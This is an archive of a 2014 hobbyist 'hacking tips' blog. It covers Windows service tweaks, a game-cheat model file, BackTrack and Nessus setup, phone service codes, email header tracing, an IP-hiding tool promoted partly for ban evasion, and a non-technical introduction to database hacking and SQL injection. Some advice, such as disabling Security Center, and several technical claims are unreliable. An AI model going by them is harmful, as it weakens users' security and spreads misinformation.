    Go to a service property page to set it to Automatic/Manual or Disabled. Right click on the service name and choose “Properties” to access the properties screen.

speed up windows 7, disable unwanted services

The configuration listed below lists a range of services you can disable to relieve system resources and yet it should provide a great experience for 95% of users. There should be little or no side effects to configuring your machine this way.

What you can disable:

    Application Experience
    Computer Browser (Disable this if you’re not joining any network)
    Desktop Windows Manager Session Manager (Disable this if you don’t want the aero effects)
    Diagnostic Policy Service
    Distributed Link Tracking Client
    IP Helper
    Offline Files
    Portable Device Enumerator Service
    Print Spooler (Disable this if you do not have a printer)
    Protected Storage
    Remote Registry (Disable it for more Security)
    Secondary Logon
    Security Center
    Server (Disable if you’re not running any network or intranet)
    Tablet PC Input Service
    TCP/IP NetBIOS Helper
    Themes (Disable if you do not want aero and good visual appearance
    Windows Error Reporting Service
    Windows Media Center Service Launcher
    Windows Search (Disable it if you hardly use Windows Search feature)
    Windows Time (Disable this if you are not synchronizing system time with Internet time automatically)

That's it.. the above configuration will increase your operating system speed and you can experience better work

How to calculate mortgage payments using Windows 7 Calculator


Hey friends, welcome back! Today iSARG has came up with another easy to use trick or simply say tip about windows 7 calculator. Most of us, almost daily uses windows 7 calculator to do simple or complex arithmetic functions. Have you ever noticed that windows 7 calculator is not the same as that Windows XP.

Microsoft has provided lots of extended features in windows 7 calculator but most of us are unaware of that.
You will be surprised to know that we can calculate House mortgage payments or simply say EMI's, Vehicle lease payments and other stuff using Windows 7 Calculator. Ahhha..if you already know then its really great and if not then don't worry today i gonna explain you step wise how to calculate Mortgage payments or vehicle lease payments using windows 7 calculator.

Steps to Calculate Mortgage Payments or Vehicle lease using Windows 7 Calculator :

    Click the View menu, point to Worksheets, and then click the worksheet for the calculation you want.
    Under Select the value you want to calculate, click the variable that you want to calculate.
    Enter the known values in the text boxes and then click Calculate.

You can use the Fuel economy, Vehicle lease, and Mortgage worksheets in Windows 7 Calculator to calculate your fuel economy, lease payments, and mortgage payments etc..

I hope you all have enjoyed the latest tip about windows 7 calculator. If you have any queries regarding this tip then don't hesitate to ask.

Tuesday, 8 April 2014

Types of hackers

Many people think, hackers are bad guys. They're wrong!
There are three kinds of hackers:
Black Hats:
The Black hat hackers, also known as Crackers, are the ones who deface websites, steals private information and mainly are doing illegal activities. They can be inspired by numerous of reasons. The most popular reasons are political, offensive or just for the fun. These hackers can have a hard time, finding a job. If you get caught be the feds (FBI and such), you'll most likely face jailtime. If anyone knows LulzSec, these guys are one of the most popular Blackhat groups known, along with Anonymous and such.

Grey Hats:
Grey Hats are also reffered as prankers. These hackers enjoy pranking and can be very annoying. They might be helping you with problems, while they're causing more damage. These hackers aren't evil, but just likes a good laugh. If they aren't cautious or their pranks are hurtfull by any means, they can/might be facing jailtime.

White Hats:
These are the good guys. White Hats dedicate their time to fight Malware. You can easily trust these hackers. They'll more than likely get a good paying job like programmer or adminstrator etc. White Hats are able to help you with all kinds of questions. These can also be spotted by their reputation on forums. They're respected and make everybody happy.

Thanks for reading this blog. If you have any questions, you're free to ask.

Unzoom Crosshair trick for Mag in Counter Strike 1.6 Steam Non-Steam


Hey friends, as we all know counter strike is one of the most famous online multiplayer game. Do you guys want to know the great AWP or MAGGING secret. How experts shoot so precise and fast zooms?? If you don't know answer and want to become a Magging Pro then don't worry i have made things easy for you. I have been working to counter strike hacks lately, so i decided to make unzoom crosshair for Magnums and AWP's.

How to get Crosshair with Unzoom Mag or AWP?

I have made some changes to v_awp.mdl model file which will optimize your zooming and provide you a crosshair at unzoom Mag or AWP. Just follow the below steps:

1. Download the optimized v_awp.mdl file from mediafire below:

Download MDL File

2. Now Copy this file to your Model's folder:

For Steam users copy the file at below path :


    C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\cstrike\models



For Non Steamers, Copy the file to Models folder which is located under Cstrike Folder. Path will be likely:


    Counter strike 1.6 >>> Cstrike >>> Models



Now lets see how the cross hair of Unzoom mag or awp will look like :


Unzoom Magnum Crosshair
See the red dot (laser). Unzoom Magnum Crosshair

You will see a red dot like of laser as shown in movies :D. I just upgraded the AWP to new era MAGS. :DP

How to Install Flash Player v11 on Backtrack Linux 5r3



Backtrack Linux is one of the most used Operating System by Hackers and some of very important Hacking tools on Backtrack requires Flash player to run example Nessus etc.. Flash player usually works correctly over 32 bit Linux but there are lot of issues while installing Flash player on 64 bit. We all know that recently all processors support 64 bit operating system reason is simple efficient processing, higher ram support and long ALU's and much more. Today i am teach you how to install Flash Player v11.x.x on Backtrack Linux 5r3 or any 64 bit Linux GNOME. As we all know 64 bit versions of software's are still not perfect to use, reason for 64 bit versions to work perfectly on PC or laptop machines it requires all processors and motherboard buses to support 64 bit and practically its not still the case because technology is still too costly and only high end Laptops supports it. None of Laptop manufacturer and assembling companies gives peoples assurance that 64 bit Operating Systems will run perfectly without software glitches. So for better performance, its still considered that we should install 32 bit versions of all such conflicting software's for example Flash player, Shock wave player etc. Lets learn how to install 32 bit Flash player over Backtrack Linux 5r3.

Backtrack Linux comes with pre installed Flash player version but that does not works correctly, so in order to correct this issue first of all we need to remove the existing copy of the Flash player installed on Firefox.

Step 1 : Open the terminal in the Backtrack Linux and run the below commands in the terminal in order to remove the pre installed Flash Player.


    aptitude purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla


    rm -f /usr/lib/firefox/plugins/libflashplayer.so


    rm -f /usr/lib/mozilla/plugins/libflashplayer.so


    rm -f /usr/lib/mozilla/plugins/flashplugin-alternative.so


    rm -f /usr/lib/mozilla/plugins/npwrapper*flash*so


    rm -f ~/.mozilla/plugins/*flash*so



Note aptitude purge command will remove files, dependencies, and configurations, while the latter removes files and dependencies. This removes the existing Flash Player.

Step 2 : In this step, Kill all the instances of Firefox over the Backtrack Linux. We can kill all the instances of Firefox by running below command in terminal:

    killall -9 /opt/firefox/firefox-bin


Step 3 : In this step we will install latest Flash player over Backtrack Linux. We are using wget in terminal here, but if Adobe changes the download link, please change the command accordingly, or just download the Flash installer from their website. We will be using wget in the following:

    wget fpdownload.macromedia.com/pub/flashplayer/updaters/11/flashplayer_11_plugin_debug.i386.tar.gz

Now run the below commands in the terminal to install:

    tar xvzf install_flash_player_11_linux.i386.tar.gz


    mkdir ~/.mozilla/plugins


    mv libflashplayer.so ~/.mozilla/plugins/


Then just delete everything else that got extracted. You should be good to go, and Nessus should be running fine.

That's all! Now enjoy all the software's over Backtrack Linux that requires Flash Player.

Hope you all enjoyed! If you face any issues contact us by writing comments below.

INTERNET PROTEST GROUPS Will Fight Back FEBRUARY 11TH 2014


INTERNET PROTEST GROUPS, news websites and user webpages are clubbing together to fight mass surveillance next week on 11 February.
The protestors are uniting under the "Day We Fight Back" banner, and include the American Civil Liberties Union (ACLU), Demand Progress, Mozilla, Reddit, environmental activist group Greenpeace and websites like Boingboing.
The groups are uniting to protest after seven odd months of US National Security Agency (NSA) revelations on the anniversary of persecuted internet activist Aaron Schwartz's passing. The campaign launched in January and now, in the final preparation stages, the protestors are asking more people to participate.
"Today the greatest threat to a free internet, and broader free society, is the National Security Agency's mass spying regime," said David Segal, executive director of Demand Progress. "If Aaron were alive he'd be on the front lines, fighting back against these practices that undermine our ability to engage with each other as genuinely free human beings."
Not participating is Wikileaks, a website that has some common ground with the protestors. However, according to a blog post on the Fight Back website, discussions with Wikipedia have failed to meet on that common ground, and it appears that the organization will not be participating.

The Day We Fight Back group has posted an open letter to Wikipedia trying to change its mind.
"We believe Wikipedia should take part because the project and its crucial mission are threatened by the mass surveillance we now face, and because Wikipedia's participation can have a meaningful impact," it said.
"Wikipedia provides access to material that might be considered subversive, that challenges authority structures, that cuts against what one can learn from government propaganda or mainstream media sources. It is precisely the people who engage in the editing and reading of this sort of material who are the most likely to be chilled - and the most likely to be noticed by the surveillance regime. In other words, the people that Wikipedia most needs to reach are the ones whose freedom is being most threatened."
On the day of action the websites and their users will put out messages and questions about the NSA and surveill

Sunday, 6 April 2014

How to Install Nessus on Backtrack 5 - Enable Nessus on Backtrack


Nessus 4.4.1 now comes pre-installed on BackTrack 5 and requires that the user activate the installation. Before you activate Nessus on your BackTrack 5 installation, be certain you have installed Nessus either to the hard drive on the computer you plan to use or inside of a virtual machine that you plan to keep on the same host system. If you activate Nessus on a bootable USB thumb drive, DVD or a virtual machine and move it to a new host system, the Nessus activation code will no longer be valid. The Nessus activation ties itself to the physical system on which it is installed. If you do decide to move the virtual machine to a new system, or jump around to different systems using a bootable USB thumb drive or DVD, you will have to re-activate Nessus. If you are using a Nessus ProfessionalFeed, you are allowed to reset your activation by clearing the current connection between a host and an activation code. By logging into the Tenable Customer Support Portal and going to "Activation Codes", you can reset the activation code-to-host pairing. Professional Feed users are currently limited to one reset every 30 days. HomeFeed users will need to re-register Nessus when moving between physical hosts.


Step 1 - Obtaining An Activation Code

Once you have Nessus installed on BackTrack 5, you will need to obtain a Nessus activation code.  If you are using Nessus at home or wish to evaluate Nessus, you can register a HomeFeed. It’s important to note that the HomeFeed is limited to 16 IP addresses per scan (whereas the ProfessionalFeed allows you to scan an unlimited number of IP addresses). The ProfessionalFeed also gives you access to features such as Configuration and Sensitive Data Auditing, SCADA plugins, Nessus Technical Support and access to the Tenable Customer Portal.

Step 2 - Activating Nessus
Be certain that your BackTrack 5 installation has access to the Internet and activate Nessus using your newly obtained activation code as follows:

As shown above, this will also initially download the appropriate plugins based on which feed you've chosen.

Step 3 - Creating A User Account

Now you will create the initial user account that will be used to login to the Nessus Web Interface:

Add user in nessus
Adding User in Nessus

After you've entered a username, the nessus-adduser program asks you if the user account should have admin privileges or not. It is recommended that the initial user account have admin privileges so you can use the Nessus Web Interface to create subsequent accounts. The only difference between a Nessus admin user and a regular user is the ability to create user accounts.

Step 4 - Starting Nessus

Using the supplied startup script, start the Nessus server:


Step 5 - Accessing the Nessus Web Interface

Once Nessus has been initially started, it will begin to index and compile all of the plugins. This can take some time, depending on the speed of your system. If Nessus is still processing plugins, you may see the following screen when accessing the web interface:


The web interface can be accessed with your browser by making an HTTPS connection to TCP port 8834 (e.g. https://localhost:8834/). If you are using a browser local to the BackTrack 5 distribution, such as the supplied version of Firefox, be certain that you enable Flash and JavaScript for this site (Flash is required to access the Nessus Web Interface, and JavaScript is required to view some of the reports). You can also access the Nessus Web Interface remotely by using the IP address assigned to BackTrack 5 (e.g. https://192.168.1.250:8834/).


3 Hidden Modes in Android Mobile phones





Hello Friends, In my previous article about hidden secret codes for Google Android mobile phones which can be used to enable/disable secret phone settings and to show various interesting and useful information. As android is a new mobile platform so these codes and hidden modes can prove highly beneficial to users that why i am sharing these with you.

Today in this topic, I will reveal 3 hidden modes in the Android Mobile phones:

    Fast Boot mode
    Download mode
    Recovery mode


DISCLAIMER: This information is intended for experienced users. It is not intended for basic users, hackers, or mobile thieves. Please do not try any of following methods if you are not familiar with mobile phones. We'll not be responsible for the use or misuse of this information, including loss of data or hardware damage. So use it at your own risk.

    1. Fast Boot Mode

This mode is used to flash the phone firmware using command line tools. To access this mode:

    Power off your Phone.
    Press and hold Call and End Call/Power keys.


    2. Download Mode

This mode is also used to flash the phone firmware. Mostly this mode is used by GUI tools for easier and quicker flashing. To access this mode:

    Power off your phone.
    Press and hold Volume Down, OK and End Call/Power keys.

 3. Recovery Mode

This mode is used for recovery purposes like to reset the phone firmware. To access this mode:

    Power off your phone.
    Press and hold Volume Down, Call and End Call/Power keys.
Once the alert triangle is shown on screen, press "Menu" key to reset the firmware or press "Home" and "End Call/Power" keys to show recovery menu.

Saturday, 5 April 2014

How to Hide your IP address online

Hey friends, today i am going to share a hack tool that will help you to hide your identity online so that you can surf online anonymously without getting monitored. Do you actually know what your IP address means? Are you aware that your IP address is exposed every time you visit a website?  How you will feel when you come to know that some neighbour is monitoring your home every time? Many websites and hackers use IP address to monitor your home address and other personal information. Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Now as hacker you will never wish that somebody monitor you. So i got a tool called Super Hide IP that will not only hide your identity online but also help you to block the monitoring by computer tracing cookies.


Super Hide IP - Hack Tool to Hide you Identity Online

Super Hide IP allows users to surf online anonymously, keeping your Identity and IP address hidden from the third party, protect your personal information against hackers and security administrators and provide full encryption of your online activity, all with a simple click of a button.

Benefits and Key Features of Super Hide IP

    Anonymous Web Surfing Click Hide IP button and you will be assigned fake IP addresses, preventing others from getting your true IP when surfing the Internet.
    Protect Your Identity Surf anonymously to prevent hackers or identity thieves from monitoring your web activity or intercepting your personal information such as your financial information. * Choose IP Country You can select to use fake IP from different countries via "Choose IP Country" option and can Check IP directly.
    Send Anonymous E-mails Hide your IP in E-mail headers. Be protected while sending e-mails via Yahoo!, Hotmail, GMail.
    Un-ban Yourself from Forums and Restricted Websites Use Super Hide IP to change your IP which allows you to access any forums or websites that has ever banned you.

You can download this tool from Google or simply Isoftdl Hackers Portal.

So friends, surf online safely and anonymously without being watched by any third person. As your privacy is yours and no body has any right to violate that.

How to trace Email Address or fake emails

Today i am going to teach you how to trace an email received in Gmail. Using this hack you can trace the source from which you have received the email.
Hackers do a lot of stuff to hack into your email account so you should always be aware of such things like how to check the authenticity of the email that it has arrived from genuine user or its a fake email.


There are two ways to check the authenticity of the email address:
1. Open the Email and Click on Show details.
2. For more deeper look Click on the triangle and then select show original.

Great, but i know 99% of you guys already know these but never tried to trace or somebody have tried but never got success. What is the reason behind that? Yup i know the reason.. All previous tricks to trace an email in Gmail are incomplete so you never received success in doing that. As i always focus on manual things as tools are for noobs and script kiddes. So guys lets learn how to trace email address manually.

How to Trace Email received in Gmail:

1. Basic Method(if sent through some website)
This method is applicable for tracing the email that is sent through the anonymous email or email forging websites.
What is the main motive behind the fake emails, Have you guys ever tried to understand. If no, then here is three four basic things why Fake emails or anonymous emails are sent.
1. For Phishing purposes: Fake page links that are used to hack your email account.
2. For Spreading Botnets: Fake emails with attachments(.php,.jpg,.bmp etc) contains bots means self spreading Trojans that steals your email contacts and email that to hackers.
3. For Stealing your personal information or to cheat you.(mails like you won 10000000$ please send us your details to claim).
4. For promoting or virul a product. Most sellers use this trick to promote their companies products online on the name of email marketing but thats all fake they are in need of customers who can buy them and some already has bots attached in them to the mail has been automatically sent to all emails that are in your friend list.

Steps to trace Email received in Gmail (very basic method):
1. Login into your Gmail account.
2. Open the email whose sender details you want to see.
3. Click on Show details.
4 That's all it will show you all basic information about the email. Below snapshot will explain you better.

Trace Email Address
Click on show Details

trace fake emails using headers
Details of Sender



2. Advanced Method:
The above trick hardly helps you to trace the email address. Now let's discuss advanced way to trace email.
Have you guys ever tried to under how emails are sent and received. Ahhahah Computer geeks you might have read in books about How email works that how its sent and how its received. If yes, then you surely haven't implemented that in practical life.

Emails are basically received in form of HTML headers. HTML headers consist of several things like Message delivered to or from, Subject, Received to or from, Date, Mime version,Content Type, X-mailer client etc.

How to trace email Advanced trick:
1. Go to the email and open it.
2. Now click on the triangle at top right end corner of the email screen as shown below and select show original email.

trace email ID
Click on Inverted Triangle to Open advance Menu


3. Now you will see something like this:
trace IP address using email


Now See the second received: from SecretMythPC [71.142.245.186] . Its the source IP address ( IP address of system) from which email has been sent.

Now open Any IP address tracing website: Example i opened http://whatismyipaddress.com/

Now Trace the IP addess 71.142.245.186 to get his details and location of the sender. You will see something like this in the output:
trace geographic location using IP address
Complete Details of Sender
That's all friends, hope you all have loved it. This is the method how cyber police detects cyber criminals and reach their destinations.
If you have any queries ask me in form of comments.

Samsung Wave Bada OS Secret hack Codes


Hi friends, Yesterday my friends purchased Samsung Wave Mobile Phone. Its a cool cellphone but BADA OS has little bit limitations like less number of applications and features. Its basically a phone for Gaming freaks :P like me, so i have taken my friends for a day and start exploring it and found some cool Secret Hidden hack codes which unlocks the several hidden factory services. I was just testing that my android hack codes are working on Samsung Wave or not. After a lot of searching on web and reverse engineering BADA OS, i got few secret hack codes. You all will going to enjoy these..

So friends here are SAMSUNG WAVE hack codes:

1. Factory Format

    *2767*3855#

Think at least 10 times before using this code as it will format your phone. It'll remove all files and settings including the internal memory storage. It'll also reinstall the phone firmware.
Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone.

2. Codes for Getting Detailed Information about the Phone

      *#0228#

This code will reveal the detailed information about your Samsung Wave Mobile Phone.


3. Service Mode

    *#197328640#

This code can be used to enter inside the Mobile Phone Service mode where You can run various tests and change settings of Mobile Phone.

4. Sim Lock or Network Lock Status

    *#7465625#

 This secret code is used to check the status of SIM Lock and Network lock of your Wave Mobile.

5. Firmware Version Codes

    *#4986*2650468#

This code will help you to explore the below mentioned things:
SW Version, HW Version, MP, RF Cal Date, CSC Version, CSC Model Spec, FFS Version, RC2 Version

6. Some more Firmware Codes

    *#1234# - SW Version and CSC Version

    *#1111# - FTA SW Version

    *#2222# - FTA HW Version


7. Wi-Fi and Bluetooth Test Codes
These will help you to run WIFI and Bluetooth tests on your mobile.

    *#526# - Wi-Fi Manual MFG Test Mode

    *#232337# - BT RF Test Mode


8. Codes to launch various Factory Tests

    *#0*# - LCD test

    *#0673# OR *#0289# - Melody test

    *#0842# - Vibration test

    *#2663# OR *#2664# - TM Command


I hope you all have enjoyed the secret hack codes. If you have more then feel free to share with us..
Note: Most of these codes i have collected by searching over internet. If you have find anything new please share with us to help your friends.
Because sharing is caring.

Thursday, 3 April 2014

How to Hack Database Online Tutorial - Basics of Database Hacking


Hello friends, welcome to worlds one of the best Ethical Hacking Teaching websites online. Today we will learn basics of Database Hacking, how to hack database online. In this tutorial we will learn what should we know prior to begin database hacking like what is database? Different types of Databases? What is Query? What all things we must know before starting to hack a Database? Most of us have heard things daily in the news that some website is Hacked? 1000's of customers crucial information is leaked. Millions of credit card information stolen by some Hacking Group. What is that? Well that is nothing just Hackers have owned the Database of the Company or website. In layman terms, Database is the heart of any Website. Like our heart pumps in blood in our veins similarly Queries flow though the database to and fro on all requests. Similarly like heart, if we own the database that means we have captured everything because its the database where everything small piece of information is stored. So Hackers only rule should be forget the rest OWN the database.  Lets learn what all things hacker should know or have before hacking any database online.
What Is a Database?

A database is a system of software to store and retrieve information in a structured format. Early databases were flat files, kind of like a big Excel file. As databases got bigger and bigger, this simple structure proved inefficient.

As a result, a scientist at IBM, Dr. Codd, developed a structure that came to be known as the relational database model. It is this model that about 97% of all databases now use, and this includes all the major software companies.

The basics of the relational model is that data should be placed in separate tables with unique keys that link the tables to avoid data duplication and to ease the retrieval of this data.

The Structure of a Database

This relational database model links data from separate tables by using a shared column or "key". The diagram below is of a simple relational database model where all the tables are linked by the column "ID". Structure sample is shown below:

Basics of Database Hacking
Relational Structure of Tables


Major Vendors in the Database Market

The enterprise database market has multiple vendors offering products that can accomplish the same task, but in different ways. The major players in this market are:

Oracle : They are the behemoth in this market with nearly 50% market share. They own multiple different database software products, including their namesake and MySQL.

Microsoft SQL Server : Microsoft entered this market in the early '90s by teaming up with Sybase to develop an enterprise database offering. As a result, MS SQL Server and Sybase still share many similarities. Originally, Microsoft was only a player in the small business market, but is slowly gaining traction in the larger enterprise market.

MySQL : This is an open-source database that you will find behind so many web sites, in part, because it's free.

IBM DB2 : IBM was the original enterprise database provider and made many the major developments in database design, but like everything about IBM, it has been in decline in recent decades.

Other major vendors include Sybase, SAS, PostgreSQL (open source), and many others. Generally, like any hack, we need to do good recon to determine the software and version to be successful as most of the database hacks are vendor specific.

Structured Query Language (SQL)

When IBM developed the early databases, they also developed a programming language for managing and manipulation this data. They called it "Structured Query Language" or as it is generally known, SQL.

This is a simple language that uses English words in similar ways that humans who speak English use them. For instance...

    SELECT means "select some data from columns in a table"
    FROM means "get the data from this table"
    WHERE means select the data that meets this condition (lastname = 'Singh').


Furthermore, words such as UPDATE, INSERT, and DROP mean in SQL exactly what you would expect them to mean.

SQL is not picky about syntax, but it is picky about logic. Although best practice is to CAPITALIZE all keywords (SELECT, FROM, WHERE), it's not required. In addition, white space is ignored. All but Microsoft, though, require that a SQL statement to end in a semicolon (;). On Microsoft products, it's optional.

SQL is standardized by ANSI, but this standardization only includes about 80% of the language or the core of SQL. Software publishers are free to add additional commands and features that are not part of the standard. This can sometimes make it difficult to transport SQL code between DBMS. It also makes it critical to do good reconnaissance on the database to know the manufacturer and the version before attacking as the attacks are often specific to the manufacturer and the version.

Each of the DBMS can be used from a command line, but each has its own GUI. Recently, MySQL released a new GUI called Workbench as seen in the previous section.

Oracle, Microsoft, and the others have similar GUIs that allow the administrator to access their systems.

Basic SQL Query

When we need to extract data from the database, it's said that we are "querying" the database. As databases are repositories for data, the ability to extract or query data is among the most important functions. As a hacker, we want to extract data, so the query is critical to getting the goods.

The basic structure of the query looks like this:

    SELECT <columns>
    FROM <table>
    WHERE <conditions>


This statement says "give me the data in the columns listed in the SELECT statement from the table that comes after the FROM keyword but only give me the rows that meet the conditions that come after the WHERE keyword."

So, if we wanted to get first name, last name, username, and password from the staff table for employees with the last name of "Singh" we could construct a statement like this:

    SELECT first_name, last_name, username, password
    FROM staff
    WHERE last_name = 'Singh";


SQL Injection

SQL injection is the most common database attack and is probably responsible for the largest dollar volume of losses from cyber crime and advanced persistent threat (APT).

It basically involves putting SQL commands in the data forms of webpages that connect to a database. These forms then send these SQL commands back to the database and the database will either authenticate the user (yes, authentication is a database function) or give up the target data.

In future tutorials, we will spend quite a bit of time using SQL injection tools and executing SQL injection attacks.
Other Vulnerabilities

Besides showing you how to do SQL injection, we will examine some of the other of vulnerabilities in databases. These involve authentication, using the database to compromising the operating system, and several others.

Now that we having covered the basics things related to databases, in future tutorials I will show you how to hack into these databases, so keep coming back!


Hacking BSNL Broadband Internet speed

BSNL Internet is most famous Internet Broadband connection service in India. Its not only due to its ready availability but mainly because of it's somewhat cost-effectiveness. But, even though, many BSNL Broadband and BSNL Cellone Dataone users are frustrated with BSNL Internet speed as they never get speed that BSNL has promised to them and BSNL broadband connection breaks after every minutes because of line errors.  So today i am going to share with you the latest hacks that you can use to increase BSNL broadband connection speed and avoid regular disconnection and line losses.

Increase BSNL Broadband connection speed:
To increase BSNL broadband speed, just follow these 4 BSNL hacks  mentioned below:
1. Change BSNL DNS servers:
The main reason for slow BSNL Broadband connection speed is slow BSNL DNS servers. So, we can increase BSNL Broadband connection speed by changing default BSNL DNS servers to fast BSNL DNS servers, which can help us to increase BSNL broadband connection speed. Using public DNS servers improves speed, as BSNL has lot of users and all using the same DNS servers. So during peak time the DNS reacts very slow and takes a lot of time to translate the host address to numerical value, called IP address that your network used to connect to website.
Use these DNS servers for best speed:

    208.67.222.222
    208.67.220.220

2. Use Adblock Plus:
The best way to increase BSNL Broadband connection speed is to block flash and other unwanted ad material on webpage, so that page loads faster, thus make BSNL Broadband apparently fast. AdBlockPlus is a firefox addon used to block flash content of page, thus helping you to increase BSNL Broadband connection speed. This has a lot of effect as it blocks unwanted advertisements and popups thus making your internet browsing experience even better.
   
3. Using TCPOptimizer:
This is another software used to optimize your TCP/IP connection settings. TCP/IP determines the maximum transfer Unit(MTU) for your device. The maximum data that your connection can send or receive per packet. Best MTU setting for BSNL broadband is 1492 ( by default its 1500 that causes an extra load on your broadband connection that why disconnections occur as you are forcing your device for doing something that it is not capable off, so optimise your TCP/IP settings). You can use TCP Optimizer your BSNL network settings. Install TCPOptimizer.
   
4. Reducing cache space:
Reduced Cache space can be used to increase BSNL Broadband speed. You can do this as:
For Internet Explorer : Tools - Internet Options - Browsing History - Settings - Disk space to use and reduce disk space value to "50".
For Firefox: Tools - Options - Advanced - Network and look for cache space. Change value to 50.


These are some BSNL hacks to increase BSNL internet broadband connection speed. Just give them a try and check out whether it works for you to increase BSNL internet speed. If you have any other BSNL hack to increase BSNL broadband speed, please mention it in comments.